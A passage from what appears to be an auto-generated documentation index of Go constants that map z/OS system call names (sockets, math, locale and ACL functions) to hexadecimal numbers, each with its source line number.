SYS_INET_NETWORK (line 2164) | SYS_INET_NETWORK = 0x353 constant SYS_INET_NTOA (line 2165) | SYS_INET_NTOA = 0x354 constant SYS_IOCTL (line 2166) | SYS_IOCTL = 0x355 constant SYS_LISTEN (line 2167) | SYS_LISTEN = 0x356 constant SYS_READV (line 2168) | SYS_READV = 0x357 constant SYS_RECV (line 2169) | SYS_RECV = 0x358 constant SYS_RECVFROM (line 2170) | SYS_RECVFROM = 0x359 constant SYS_SETHOSTENT (line 2171) | SYS_SETHOSTENT = 0x360 constant SYS_SETNETENT (line 2172) | SYS_SETNETENT = 0x361 constant SYS_SETPEER (line 2173) | SYS_SETPEER = 0x362 constant SYS_SETPROTOENT (line 2174) | SYS_SETPROTOENT = 0x363 constant SYS_SETSERVENT (line 2175) | SYS_SETSERVENT = 0x364 constant SYS_SETSOCKOPT (line 2176) | SYS_SETSOCKOPT = 0x365 constant SYS_SHUTDOWN (line 2177) | SYS_SHUTDOWN = 0x366 constant SYS_SOCKET (line 2178) | SYS_SOCKET = 0x367 constant SYS_SOCKETPAIR (line 2179) | SYS_SOCKETPAIR = 0x368 constant SYS_WRITEV (line 2180) | SYS_WRITEV = 0x369 constant SYS_ENDNETENT (line 2181) | SYS_ENDNETENT = 0x370 constant SYS_CLOSELOG (line 2182) | SYS_CLOSELOG = 0x371 constant SYS_OPENLOG (line 2183) | SYS_OPENLOG = 0x372 constant SYS_SETLOGMASK (line 2184) | SYS_SETLOGMASK = 0x373 constant SYS_SYSLOG (line 2185) | SYS_SYSLOG = 0x374 constant SYS_PTSNAME (line 2186) | SYS_PTSNAME = 0x375 constant SYS_SETREUID (line 2187) | SYS_SETREUID = 0x376 constant SYS_SETREGID (line 2188) | SYS_SETREGID = 0x377 constant SYS_REALPATH (line 2189) | SYS_REALPATH = 0x378 constant SYS___SIGNGAM (line 2190) | SYS___SIGNGAM = 0x379 constant SYS_POLL (line 2191) | SYS_POLL = 0x380 constant SYS_REXEC (line 2192) | SYS_REXEC = 0x381 constant SYS___ISASCII2 (line 2193) | SYS___ISASCII2 = 0x382 constant SYS___TOASCII2 (line 2194) | SYS___TOASCII2 = 0x383 constant SYS_CHPRIORITY (line 2195) | SYS_CHPRIORITY = 0x384 constant SYS_PTHREAD_ATTR_SETSYNCTYPE_NP (line 2196) | SYS_PTHREAD_ATTR_SETSYNCTYPE_NP = 0x385 constant SYS_PTHREAD_ATTR_GETSYNCTYPE_NP (line 2197) | SYS_PTHREAD_ATTR_GETSYNCTYPE_NP = 0x386 constant SYS_PTHREAD_SET_LIMIT_NP (line 2198) | SYS_PTHREAD_SET_LIMIT_NP = 0x387 constant SYS___STNETENT (line 2199) | SYS___STNETENT = 0x388 constant SYS___STPROTOENT (line 2200) | SYS___STPROTOENT = 0x389 constant SYS___SELECT1 (line 2201) | SYS___SELECT1 = 0x390 constant SYS_PTHREAD_SECURITY_NP (line 2202) | SYS_PTHREAD_SECURITY_NP = 0x391 constant SYS___CHECK_RESOURCE_AUTH_NP (line 2203) | SYS___CHECK_RESOURCE_AUTH_NP = 0x392 constant SYS___CONVERT_ID_NP (line 2204) | SYS___CONVERT_ID_NP = 0x393 constant SYS___OPENVMREL (line 2205) | SYS___OPENVMREL = 0x394 constant SYS_WMEMCHR (line 2206) | SYS_WMEMCHR = 0x395 constant SYS_WMEMCMP (line 2207) | SYS_WMEMCMP = 0x396 constant SYS_WMEMCPY (line 2208) | SYS_WMEMCPY = 0x397 constant SYS_WMEMMOVE (line 2209) | SYS_WMEMMOVE = 0x398 constant SYS_WMEMSET (line 2210) | SYS_WMEMSET = 0x399 constant SYS___FPUTWC (line 2211) | SYS___FPUTWC = 0x400 constant SYS___PUTWC (line 2212) | SYS___PUTWC = 0x401 constant SYS___PWCHAR (line 2213) | SYS___PWCHAR = 0x402 constant SYS___WCSFTM (line 2214) | SYS___WCSFTM = 0x403 constant SYS___WCSTOK (line 2215) | SYS___WCSTOK = 0x404 constant SYS___WCWDTH (line 2216) | SYS___WCWDTH = 0x405 constant SYS_T_ACCEPT (line 2217) | SYS_T_ACCEPT = 0x409 constant SYS_T_GETINFO (line 2218) | SYS_T_GETINFO = 0x410 constant SYS_T_GETPROTADDR (line 2219) | SYS_T_GETPROTADDR = 0x411 constant SYS_T_GETSTATE (line 2220) | SYS_T_GETSTATE = 0x412 constant SYS_T_LISTEN (line 2221) | SYS_T_LISTEN = 0x413 constant SYS_T_LOOK (line 2222) | SYS_T_LOOK = 0x414 constant SYS_T_OPEN (line 2223) | SYS_T_OPEN = 0x415 constant SYS_T_OPTMGMT (line 2224) | SYS_T_OPTMGMT = 0x416 constant SYS_T_RCV (line 2225) | SYS_T_RCV = 0x417 constant SYS_T_RCVCONNECT (line 2226) | SYS_T_RCVCONNECT = 0x418 constant SYS_T_RCVDIS (line 2227) | SYS_T_RCVDIS = 0x419 constant SYS_T_SNDUDATA (line 2228) | SYS_T_SNDUDATA = 0x420 constant SYS_T_STRERROR (line 2229) | SYS_T_STRERROR = 0x421 constant SYS_T_SYNC (line 2230) | SYS_T_SYNC = 0x422 constant SYS_T_UNBIND (line 2231) | SYS_T_UNBIND = 0x423 constant SYS___T_ERRNO (line 2232) | SYS___T_ERRNO = 0x424 constant SYS___RECVMSG2 (line 2233) | SYS___RECVMSG2 = 0x425 constant SYS___SENDMSG2 (line 2234) | SYS___SENDMSG2 = 0x426 constant SYS_FATTACH (line 2235) | SYS_FATTACH = 0x427 constant SYS_FDETACH (line 2236) | SYS_FDETACH = 0x428 constant SYS_GETMSG (line 2237) | SYS_GETMSG = 0x429 constant SYS_GETCONTEXT (line 2238) | SYS_GETCONTEXT = 0x430 constant SYS_SETCONTEXT (line 2239) | SYS_SETCONTEXT = 0x431 constant SYS_MAKECONTEXT (line 2240) | SYS_MAKECONTEXT = 0x432 constant SYS_SWAPCONTEXT (line 2241) | SYS_SWAPCONTEXT = 0x433 constant SYS_PTHREAD_GETSPECIFIC_D8_NP (line 2242) | SYS_PTHREAD_GETSPECIFIC_D8_NP = 0x434 constant SYS_GETCLIENTID (line 2243) | SYS_GETCLIENTID = 0x470 constant SYS___GETCLIENTID (line 2244) | SYS___GETCLIENTID = 0x471 constant SYS_GETSTABLESIZE (line 2245) | SYS_GETSTABLESIZE = 0x472 constant SYS_GETIBMOPT (line 2246) | SYS_GETIBMOPT = 0x473 constant SYS_GETIBMSOCKOPT (line 2247) | SYS_GETIBMSOCKOPT = 0x474 constant SYS_GIVESOCKET (line 2248) | SYS_GIVESOCKET = 0x475 constant SYS_IBMSFLUSH (line 2249) | SYS_IBMSFLUSH = 0x476 constant SYS_MAXDESC (line 2250) | SYS_MAXDESC = 0x477 constant SYS_SETIBMOPT (line 2251) | SYS_SETIBMOPT = 0x478 constant SYS_SETIBMSOCKOPT (line 2252) | SYS_SETIBMSOCKOPT = 0x479 constant SYS___SERVER_PWU (line 2253) | SYS___SERVER_PWU = 0x480 constant SYS_PTHREAD_TAG_NP (line 2254) | SYS_PTHREAD_TAG_NP = 0x481 constant SYS___CONSOLE (line 2255) | SYS___CONSOLE = 0x482 constant SYS___WSINIT (line 2256) | SYS___WSINIT = 0x483 constant SYS___IPTCPN (line 2257) | SYS___IPTCPN = 0x489 constant SYS___SERVER_CLASSIFY (line 2258) | SYS___SERVER_CLASSIFY = 0x490 constant SYS___HEAPRPT (line 2259) | SYS___HEAPRPT = 0x496 constant SYS___ISBFP (line 2260) | SYS___ISBFP = 0x500 constant SYS___FP_CAST (line 2261) | SYS___FP_CAST = 0x501 constant SYS___CERTIFICATE (line 2262) | SYS___CERTIFICATE = 0x502 constant SYS_SEND_FILE (line 2263) | SYS_SEND_FILE = 0x503 constant SYS_AIO_CANCEL (line 2264) | SYS_AIO_CANCEL = 0x504 constant SYS_AIO_ERROR (line 2265) | SYS_AIO_ERROR = 0x505 constant SYS_AIO_READ (line 2266) | SYS_AIO_READ = 0x506 constant SYS_AIO_RETURN (line 2267) | SYS_AIO_RETURN = 0x507 constant SYS_AIO_SUSPEND (line 2268) | SYS_AIO_SUSPEND = 0x508 constant SYS_AIO_WRITE (line 2269) | SYS_AIO_WRITE = 0x509 constant SYS_PTHREAD_RWLOCK_TRYWRLOCK (line 2270) | SYS_PTHREAD_RWLOCK_TRYWRLOCK = 0x510 constant SYS_PTHREAD_RWLOCK_UNLOCK (line 2271) | SYS_PTHREAD_RWLOCK_UNLOCK = 0x511 constant SYS_PTHREAD_RWLOCK_WRLOCK (line 2272) | SYS_PTHREAD_RWLOCK_WRLOCK = 0x512 constant SYS_PTHREAD_RWLOCKATTR_GETPSHARED (line 2273) | SYS_PTHREAD_RWLOCKATTR_GETPSHARED = 0x513 constant SYS_PTHREAD_RWLOCKATTR_SETPSHARED (line 2274) | SYS_PTHREAD_RWLOCKATTR_SETPSHARED = 0x514 constant SYS_PTHREAD_RWLOCKATTR_INIT (line 2275) | SYS_PTHREAD_RWLOCKATTR_INIT = 0x515 constant SYS_PTHREAD_RWLOCKATTR_DESTROY (line 2276) | SYS_PTHREAD_RWLOCKATTR_DESTROY = 0x516 constant SYS___CTTBL (line 2277) | SYS___CTTBL = 0x517 constant SYS_PTHREAD_MUTEXATTR_SETTYPE (line 2278) | SYS_PTHREAD_MUTEXATTR_SETTYPE = 0x518 constant SYS_PTHREAD_MUTEXATTR_GETTYPE (line 2279) | SYS_PTHREAD_MUTEXATTR_GETTYPE = 0x519 constant SYS___FP_UNORDERED (line 2280) | SYS___FP_UNORDERED = 0x520 constant SYS___FP_READ_RND (line 2281) | SYS___FP_READ_RND = 0x521 constant SYS___FP_READ_RND_B (line 2282) | SYS___FP_READ_RND_B = 0x522 constant SYS___FP_SWAP_RND (line 2283) | SYS___FP_SWAP_RND = 0x523 constant SYS___FP_SWAP_RND_B (line 2284) | SYS___FP_SWAP_RND_B = 0x524 constant SYS___FP_LEVEL (line 2285) | SYS___FP_LEVEL = 0x525 constant SYS___FP_BTOH (line 2286) | SYS___FP_BTOH = 0x526 constant SYS___FP_HTOB (line 2287) | SYS___FP_HTOB = 0x527 constant SYS___FPC_RD (line 2288) | SYS___FPC_RD = 0x528 constant SYS___FPC_WR (line 2289) | SYS___FPC_WR = 0x529 constant SYS_PTHREAD_SETCANCELTYPE (line 2290) | SYS_PTHREAD_SETCANCELTYPE = 0x600 constant SYS_PTHREAD_TESTCANCEL (line 2291) | SYS_PTHREAD_TESTCANCEL = 0x601 constant SYS___ATANF_B (line 2292) | SYS___ATANF_B = 0x602 constant SYS___ATANL_B (line 2293) | SYS___ATANL_B = 0x603 constant SYS___CEILF_B (line 2294) | SYS___CEILF_B = 0x604 constant SYS___CEILL_B (line 2295) | SYS___CEILL_B = 0x605 constant SYS___COSF_B (line 2296) | SYS___COSF_B = 0x606 constant SYS___COSL_B (line 2297) | SYS___COSL_B = 0x607 constant SYS___FABSF_B (line 2298) | SYS___FABSF_B = 0x608 constant SYS___FABSL_B (line 2299) | SYS___FABSL_B = 0x609 constant SYS___SINF_B (line 2300) | SYS___SINF_B = 0x610 constant SYS___SINL_B (line 2301) | SYS___SINL_B = 0x611 constant SYS___TANF_B (line 2302) | SYS___TANF_B = 0x612 constant SYS___TANL_B (line 2303) | SYS___TANL_B = 0x613 constant SYS___TANHF_B (line 2304) | SYS___TANHF_B = 0x614 constant SYS___TANHL_B (line 2305) | SYS___TANHL_B = 0x615 constant SYS___ACOSF_B (line 2306) | SYS___ACOSF_B = 0x616 constant SYS___ACOSL_B (line 2307) | SYS___ACOSL_B = 0x617 constant SYS___ASINF_B (line 2308) | SYS___ASINF_B = 0x618 constant SYS___ASINL_B (line 2309) | SYS___ASINL_B = 0x619 constant SYS___LOGF_B (line 2310) | SYS___LOGF_B = 0x620 constant SYS___LOGL_B (line 2311) | SYS___LOGL_B = 0x621 constant SYS___LOG10F_B (line 2312) | SYS___LOG10F_B = 0x622 constant SYS___LOG10L_B (line 2313) | SYS___LOG10L_B = 0x623 constant SYS___POWF_B (line 2314) | SYS___POWF_B = 0x624 constant SYS___POWL_B (line 2315) | SYS___POWL_B = 0x625 constant SYS___SINHF_B (line 2316) | SYS___SINHF_B = 0x626 constant SYS___SINHL_B (line 2317) | SYS___SINHL_B = 0x627 constant SYS___SQRTF_B (line 2318) | SYS___SQRTF_B = 0x628 constant SYS___SQRTL_B (line 2319) | SYS___SQRTL_B = 0x629 constant SYS___MODFL_B (line 2320) | SYS___MODFL_B = 0x630 constant SYS_ABSF (line 2321) | SYS_ABSF = 0x631 constant SYS_ABSL (line 2322) | SYS_ABSL = 0x632 constant SYS_ACOSF (line 2323) | SYS_ACOSF = 0x633 constant SYS_ACOSL (line 2324) | SYS_ACOSL = 0x634 constant SYS_ASINF (line 2325) | SYS_ASINF = 0x635 constant SYS_ASINL (line 2326) | SYS_ASINL = 0x636 constant SYS_ATAN2F (line 2327) | SYS_ATAN2F = 0x637 constant SYS_ATAN2L (line 2328) | SYS_ATAN2L = 0x638 constant SYS_ATANF (line 2329) | SYS_ATANF = 0x639 constant SYS_COSHL (line 2330) | SYS_COSHL = 0x640 constant SYS_EXPF (line 2331) | SYS_EXPF = 0x641 constant SYS_EXPL (line 2332) | SYS_EXPL = 0x642 constant SYS_TANHF (line 2333) | SYS_TANHF = 0x643 constant SYS_TANHL (line 2334) | SYS_TANHL = 0x644 constant SYS_LOG10F (line 2335) | SYS_LOG10F = 0x645 constant SYS_LOG10L (line 2336) | SYS_LOG10L = 0x646 constant SYS_LOGF (line 2337) | SYS_LOGF = 0x647 constant SYS_LOGL (line 2338) | SYS_LOGL = 0x648 constant SYS_POWF (line 2339) | SYS_POWF = 0x649 constant SYS_SINHL (line 2340) | SYS_SINHL = 0x650 constant SYS_TANF (line 2341) | SYS_TANF = 0x651 constant SYS_TANL (line 2342) | SYS_TANL = 0x652 constant SYS_FABSF (line 2343) | SYS_FABSF = 0x653 constant SYS_FABSL (line 2344) | SYS_FABSL = 0x654 constant SYS_FLOORF (line 2345) | SYS_FLOORF = 0x655 constant SYS_FLOORL (line 2346) | SYS_FLOORL = 0x656 constant SYS_FMODF (line 2347) | SYS_FMODF = 0x657 constant SYS_FMODL (line 2348) | SYS_FMODL = 0x658 constant SYS_FREXPF (line 2349) | SYS_FREXPF = 0x659 constant SYS___CHATTR (line 2350) | SYS___CHATTR = 0x660 constant SYS___FCHATTR (line 2351) | SYS___FCHATTR = 0x661 constant SYS___TOCCSID (line 2352) | SYS___TOCCSID = 0x662 constant SYS___CSNAMETYPE (line 2353) | SYS___CSNAMETYPE = 0x663 constant SYS___TOCSNAME (line 2354) | SYS___TOCSNAME = 0x664 constant SYS___CCSIDTYPE (line 2355) | SYS___CCSIDTYPE = 0x665 constant SYS___AE_CORRESTBL_QUERY (line 2356) | SYS___AE_CORRESTBL_QUERY = 0x666 constant SYS___AE_AUTOCONVERT_STATE (line 2357) | SYS___AE_AUTOCONVERT_STATE = 0x667 constant SYS_DN_FIND (line 2358) | SYS_DN_FIND = 0x668 constant SYS___GETHOSTBYADDR_A (line 2359) | SYS___GETHOSTBYADDR_A = 0x669 constant SYS___MBLEN_SB_A (line 2360) | SYS___MBLEN_SB_A = 0x670 constant SYS___MBLEN_STD_A (line 2361) | SYS___MBLEN_STD_A = 0x671 constant SYS___MBLEN_UTF (line 2362) | SYS___MBLEN_UTF = 0x672 constant SYS___MBSTOWCS_A (line 2363) | SYS___MBSTOWCS_A = 0x673 constant SYS___MBSTOWCS_STD_A (line 2364) | SYS___MBSTOWCS_STD_A = 0x674 constant SYS___MBTOWC_A (line 2365) | SYS___MBTOWC_A = 0x675 constant SYS___MBTOWC_ISO1 (line 2366) | SYS___MBTOWC_ISO1 = 0x676 constant SYS___MBTOWC_SBCS (line 2367) | SYS___MBTOWC_SBCS = 0x677 constant SYS___MBTOWC_MBCS (line 2368) | SYS___MBTOWC_MBCS = 0x678 constant SYS___MBTOWC_UTF (line 2369) | SYS___MBTOWC_UTF = 0x679 constant SYS___CSID_A (line 2370) | SYS___CSID_A = 0x680 constant SYS___CSID_STD_A (line 2371) | SYS___CSID_STD_A = 0x681 constant SYS___WCSID_A (line 2372) | SYS___WCSID_A = 0x682 constant SYS___WCSID_STD_A (line 2373) | SYS___WCSID_STD_A = 0x683 constant SYS___WCTOMB_A (line 2374) | SYS___WCTOMB_A = 0x684 constant SYS___WCTOMB_ISO1 (line 2375) | SYS___WCTOMB_ISO1 = 0x685 constant SYS___WCTOMB_STD_A (line 2376) | SYS___WCTOMB_STD_A = 0x686 constant SYS___WCTOMB_UTF (line 2377) | SYS___WCTOMB_UTF = 0x687 constant SYS___WCWIDTH_A (line 2378) | SYS___WCWIDTH_A = 0x688 constant SYS___GETGRNAM_R_A (line 2379) | SYS___GETGRNAM_R_A = 0x689 constant SYS___READDIR_R_A (line 2380) | SYS___READDIR_R_A = 0x690 constant SYS___E2A_S (line 2381) | SYS___E2A_S = 0x691 constant SYS___FNMATCH_A (line 2382) | SYS___FNMATCH_A = 0x692 constant SYS___FNMATCH_C_A (line 2383) | SYS___FNMATCH_C_A = 0x693 constant SYS___EXECL_A (line 2384) | SYS___EXECL_A = 0x694 constant SYS___FNMATCH_STD_A (line 2385) | SYS___FNMATCH_STD_A = 0x695 constant SYS___REGCOMP_A (line 2386) | SYS___REGCOMP_A = 0x696 constant SYS___REGCOMP_STD_A (line 2387) | SYS___REGCOMP_STD_A = 0x697 constant SYS___REGERROR_A (line 2388) | SYS___REGERROR_A = 0x698 constant SYS___REGERROR_STD_A (line 2389) | SYS___REGERROR_STD_A = 0x699 constant SYS___SWPRINTF_A (line 2390) | SYS___SWPRINTF_A = 0x700 constant SYS___FSCANF_A (line 2391) | SYS___FSCANF_A = 0x701 constant SYS___SCANF_A (line 2392) | SYS___SCANF_A = 0x702 constant SYS___SSCANF_A (line 2393) | SYS___SSCANF_A = 0x703 constant SYS___SWSCANF_A (line 2394) | SYS___SWSCANF_A = 0x704 constant SYS___ATOF_A (line 2395) | SYS___ATOF_A = 0x705 constant SYS___ATOI_A (line 2396) | SYS___ATOI_A = 0x706 constant SYS___ATOL_A (line 2397) | SYS___ATOL_A = 0x707 constant SYS___STRTOD_A (line 2398) | SYS___STRTOD_A = 0x708 constant SYS___STRTOL_A (line 2399) | SYS___STRTOL_A = 0x709 constant SYS___L64A_A (line 2400) | SYS___L64A_A = 0x710 constant SYS___STRERROR_A (line 2401) | SYS___STRERROR_A = 0x711 constant SYS___PERROR_A (line 2402) | SYS___PERROR_A = 0x712 constant SYS___FETCH_A (line 2403) | SYS___FETCH_A = 0x713 constant SYS___GETENV_A (line 2404) | SYS___GETENV_A = 0x714 constant SYS___MKSTEMP_A (line 2405) | SYS___MKSTEMP_A = 0x717 constant SYS___PTSNAME_A (line 2406) | SYS___PTSNAME_A = 0x718 constant SYS___PUTENV_A (line 2407) | SYS___PUTENV_A = 0x719 constant SYS___CHDIR_A (line 2408) | SYS___CHDIR_A = 0x720 constant SYS___CHOWN_A (line 2409) | SYS___CHOWN_A = 0x721 constant SYS___CHROOT_A (line 2410) | SYS___CHROOT_A = 0x722 constant SYS___GETCWD_A (line 2411) | SYS___GETCWD_A = 0x723 constant SYS___GETWD_A (line 2412) | SYS___GETWD_A = 0x724 constant SYS___LCHOWN_A (line 2413) | SYS___LCHOWN_A = 0x725 constant SYS___LINK_A (line 2414) | SYS___LINK_A = 0x726 constant SYS___PATHCONF_A (line 2415) | SYS___PATHCONF_A = 0x727 constant SYS___IF_NAMEINDEX_A (line 2416) | SYS___IF_NAMEINDEX_A = 0x728 constant SYS___READLINK_A (line 2417) | SYS___READLINK_A = 0x729 constant SYS___EXTLINK_NP_A (line 2418) | SYS___EXTLINK_NP_A = 0x730 constant SYS___ISALNUM_A (line 2419) | SYS___ISALNUM_A = 0x731 constant SYS___ISALPHA_A (line 2420) | SYS___ISALPHA_A = 0x732 constant SYS___A2E_S (line 2421) | SYS___A2E_S = 0x733 constant SYS___ISCNTRL_A (line 2422) | SYS___ISCNTRL_A = 0x734 constant SYS___ISDIGIT_A (line 2423) | SYS___ISDIGIT_A = 0x735 constant SYS___ISGRAPH_A (line 2424) | SYS___ISGRAPH_A = 0x736 constant SYS___ISLOWER_A (line 2425) | SYS___ISLOWER_A = 0x737 constant SYS___ISPRINT_A (line 2426) | SYS___ISPRINT_A = 0x738 constant SYS___ISPUNCT_A (line 2427) | SYS___ISPUNCT_A = 0x739 constant SYS___ISWALPHA_A (line 2428) | SYS___ISWALPHA_A = 0x740 constant SYS___A2E_L (line 2429) | SYS___A2E_L = 0x741 constant SYS___ISWCNTRL_A (line 2430) | SYS___ISWCNTRL_A = 0x742 constant SYS___ISWDIGIT_A (line 2431) | SYS___ISWDIGIT_A = 0x743 constant SYS___ISWGRAPH_A (line 2432) | SYS___ISWGRAPH_A = 0x744 constant SYS___ISWLOWER_A (line 2433) | SYS___ISWLOWER_A = 0x745 constant SYS___ISWPRINT_A (line 2434) | SYS___ISWPRINT_A = 0x746 constant SYS___ISWPUNCT_A (line 2435) | SYS___ISWPUNCT_A = 0x747 constant SYS___ISWSPACE_A (line 2436) | SYS___ISWSPACE_A = 0x748 constant SYS___ISWUPPER_A (line 2437) | SYS___ISWUPPER_A = 0x749 constant SYS___REMOVE_A (line 2438) | SYS___REMOVE_A = 0x750 constant SYS___RENAME_A (line 2439) | SYS___RENAME_A = 0x751 constant SYS___TMPNAM_A (line 2440) | SYS___TMPNAM_A = 0x752 constant SYS___FOPEN_A (line 2441) | SYS___FOPEN_A = 0x753 constant SYS___FREOPEN_A (line 2442) | SYS___FREOPEN_A = 0x754 constant SYS___CUSERID_A (line 2443) | SYS___CUSERID_A = 0x755 constant SYS___POPEN_A (line 2444) | SYS___POPEN_A = 0x756 constant SYS___TEMPNAM_A (line 2445) | SYS___TEMPNAM_A = 0x757 constant SYS___FTW_A (line 2446) | SYS___FTW_A = 0x758 constant SYS___GETGRENT_A (line 2447) | SYS___GETGRENT_A = 0x759 constant SYS___INET_NTOP_A (line 2448) | SYS___INET_NTOP_A = 0x760 constant SYS___GETPASS_A (line 2449) | SYS___GETPASS_A = 0x761 constant SYS___GETPWENT_A (line 2450) | SYS___GETPWENT_A = 0x762 constant SYS___GETPWNAM_A (line 2451) | SYS___GETPWNAM_A = 0x763 constant SYS___GETPWUID_A (line 2452) | SYS___GETPWUID_A = 0x764 constant SYS_____CHECK_RESOURCE_AUTH_NP_A (line 2453) | SYS_____CHECK_RESOURCE_AUTH_NP_A = 0x765 constant SYS___CHECKSCHENV_A (line 2454) | SYS___CHECKSCHENV_A = 0x766 constant SYS___CONNECTSERVER_A (line 2455) | SYS___CONNECTSERVER_A = 0x767 constant SYS___CONNECTWORKMGR_A (line 2456) | SYS___CONNECTWORKMGR_A = 0x768 constant SYS_____CONSOLE_A (line 2457) | SYS_____CONSOLE_A = 0x769 constant SYS___MSGSND_A (line 2458) | SYS___MSGSND_A = 0x770 constant SYS___MSGXRCV_A (line 2459) | SYS___MSGXRCV_A = 0x771 constant SYS___NFTW_A (line 2460) | SYS___NFTW_A = 0x772 constant SYS_____PASSWD_A (line 2461) | SYS_____PASSWD_A = 0x773 constant SYS___PTHREAD_SECURITY_NP_A (line 2462) | SYS___PTHREAD_SECURITY_NP_A = 0x774 constant SYS___QUERYMETRICS_A (line 2463) | SYS___QUERYMETRICS_A = 0x775 constant SYS___QUERYSCHENV (line 2464) | SYS___QUERYSCHENV = 0x776 constant SYS___READV_A (line 2465) | SYS___READV_A = 0x777 constant SYS_____SERVER_CLASSIFY_A (line 2466) | SYS_____SERVER_CLASSIFY_A = 0x778 constant SYS_____SERVER_INIT_A (line 2467) | SYS_____SERVER_INIT_A = 0x779 constant SYS___W_GETPSENT_A (line 2468) | SYS___W_GETPSENT_A = 0x780 constant SYS___WRITEV_A (line 2469) | SYS___WRITEV_A = 0x781 constant SYS___W_STATFS_A (line 2470) | SYS___W_STATFS_A = 0x782 constant SYS___W_STATVFS_A (line 2471) | SYS___W_STATVFS_A = 0x783 constant SYS___FPUTC_A (line 2472) | SYS___FPUTC_A = 0x784 constant SYS___PUTCHAR_A (line 2473) | SYS___PUTCHAR_A = 0x785 constant SYS___PUTS_A (line 2474) | SYS___PUTS_A = 0x786 constant SYS___FGETS_A (line 2475) | SYS___FGETS_A = 0x787 constant SYS___GETS_A (line 2476) | SYS___GETS_A = 0x788 constant SYS___FPUTS_A (line 2477) | SYS___FPUTS_A = 0x789 constant SYS___PUTC_A (line 2478) | SYS___PUTC_A = 0x790 constant SYS___AE_THREAD_SETMODE (line 2479) | SYS___AE_THREAD_SETMODE = 0x791 constant SYS___AE_THREAD_SWAPMODE (line 2480) | SYS___AE_THREAD_SWAPMODE = 0x792 constant SYS___GETNETBYADDR_A (line 2481) | SYS___GETNETBYADDR_A = 0x793 constant SYS___GETNETBYNAME_A (line 2482) | SYS___GETNETBYNAME_A = 0x794 constant SYS___GETNETENT_A (line 2483) | SYS___GETNETENT_A = 0x795 constant SYS___GETPROTOBYNAME_A (line 2484) | SYS___GETPROTOBYNAME_A = 0x796 constant SYS___GETPROTOBYNUMBER_A (line 2485) | SYS___GETPROTOBYNUMBER_A = 0x797 constant SYS___GETPROTOENT_A (line 2486) | SYS___GETPROTOENT_A = 0x798 constant SYS___GETSERVBYNAME_A (line 2487) | SYS___GETSERVBYNAME_A = 0x799 constant SYS_ACL_FIRST_ENTRY (line 2488) | SYS_ACL_FIRST_ENTRY = 0x800 constant SYS_ACL_GET_ENTRY (line 2489) | SYS_ACL_GET_ENTRY = 0x801 constant SYS_ACL_VALID (line 2490) | SYS_ACL_VALID = 0x802 constant SYS_ACL_CREATE_ENTRY (line 2491) | SYS_ACL_CREATE_ENTRY = 0x803 constant SYS_ACL_DELETE_ENTRY (line 2492) | SYS_ACL_DELETE_ENTRY = 0x804 constant SYS_ACL_UPDATE_ENTRY (line 2493) | SYS_ACL_UPDATE_ENTRY = 0x805 constant SYS_ACL_DELETE_FD (line 2494) | SYS_ACL_DELETE_FD = 0x806 constant SYS_ACL_DELETE_FILE (line 2495) | SYS_ACL_DELETE_FILE = 0x807 constant SYS_ACL_GET_FD (line 2496) | SYS_ACL_GET_FD = 0x808 constant SYS_ACL_GET_FILE (line 2497) | SYS_ACL_GET_FILE = 0x809 constant SYS___ERFL_B (line 2498) | SYS___ERFL_B = 0x810 constant SYS___ERFCL_B (line 2499) | SYS___ERFCL_B = 0x811 constant SYS___LGAMMAL_B (line 2500) | SYS___LGAMMAL_B = 0x812 constant SYS___SETHOOKEVENTS (line 2501) | SYS___SETHOOKEVENTS = 0x813 constant SYS_IF_NAMETOINDEX (line 2502) | SYS_IF_NAMETOINDEX = 0x814 constant SYS_IF_INDEXTONAME (line 2503) | SYS_IF_INDEXTONAME = 0x815 constant SYS_IF_NAMEINDEX (line 2504) | SYS_IF_NAMEINDEX = 0x816 constant SYS_IF_FREENAMEINDEX (line 2505) | SYS_IF_FREENAMEINDEX = 0x817 constant SYS_GETADDRINFO (line 2506) | SYS_GETADDRINFO = 0x818 constant SYS_GETNAMEINFO (line 2507) | SYS_GETNAMEINFO = 0x819 constant SYS___DYNFREE_A (line 2508) | SYS___DYNFREE_A = 0x820 constant SYS___RES_QUERY_A (line 2509) | SYS___RES_QUERY_A = 0x821 constant SYS___RES_SEARCH_A (line 2510) | SYS___RES_SEARCH_A = 0x822 constant SYS___RES_QUERYDOMAIN_A (line 2511) | SYS___RES_QUERYDOMAIN_A = 0x823 constant SYS___RES_MKQUERY_A (line 2512) | SYS___RES_MKQUERY_A = 0x824 constant SYS___RES_SEND_A (line 2513) | SYS___RES_SEND_A = 0x825 constant SYS___DN_EXPAND_A (line 2514) | SYS___DN_EXPAND_A = 0x826 constant SYS___DN_SKIPNAME_A (line 2515) | SYS___DN_SKIPNAME_A = 0x827 constant SYS___DN_COMP_A (line 2516) | SYS___DN_COMP_A = 0x828 constant SYS___DN_FIND_A (line 2517) | SYS___DN_FIND_A = 0x829 constant SYS___INET_NTOA_A (line 2518) | SYS___INET_NTOA_A = 0x830 constant SYS___INET_NETWORK_A (line 2519) | SYS___INET_NETWORK_A = 0x831 constant SYS___ACCEPT_A (line 2520) | SYS___ACCEPT_A = 0x832 constant SYS___ACCEPT_AND_RECV_A (line 2521) | SYS___ACCEPT_AND_RECV_A = 0x833 constant SYS___BIND_A (line 2522) | SYS___BIND_A = 0x834 constant SYS___CONNECT_A (line 2523) | SYS___CONNECT_A = 0x835 constant SYS___GETPEERNAME_A (line 2524) | SYS___GETPEERNAME_A = 0x836 constant SYS___GETSOCKNAME_A (line 2525) | SYS___GETSOCKNAME_A = 0x837 constant SYS___RECVFROM_A (line 2526) | SYS___RECVFROM_A = 0x838 constant SYS___SENDTO_A (line 2527) | SYS___SENDTO_A = 0x839 constant SYS___LCHATTR (line 2528) | SYS___LCHATTR = 0x840 constant SYS___WRITEDOWN (line 2529) | SYS___WRITEDOWN = 0x841 constant SYS_PTHREAD_MUTEX_INIT2 (line 2530) | SYS_PTHREAD_MUTEX_INIT2 = 0x842 constant SYS___ACOSHF_B (line 2531) | SYS___ACOSHF_B = 0x843 constant SYS___ACOSHL_B (line 2532) | SYS___ACOSHL_B = 0x844 constant SYS___ASINHF_B (line 2533) | SYS___ASINHF_B = 0x845 constant SYS___ASINHL_B (line 2534) | SYS___ASINHL_B = 0x846 constant SYS___ATANHF_B (line 2535) | SYS___ATANHF_B = 0x847 constant SYS___ATANHL_B (line 2536) | SYS___ATANHL_B = 0x848 constant SYS___CBRTF_B (line 2537) | SYS___CBRTF_B = 0x849 constant SYS___EXP2F_B (line 2538) | SYS___EXP2F_B = 0x850 constant SYS___EXP2L_B (line 2539) | SYS___EXP2L_B = 0x851 constant SYS___EXPM1F_B (line 2540) | SYS___EXPM1F_B = 0x852 constant 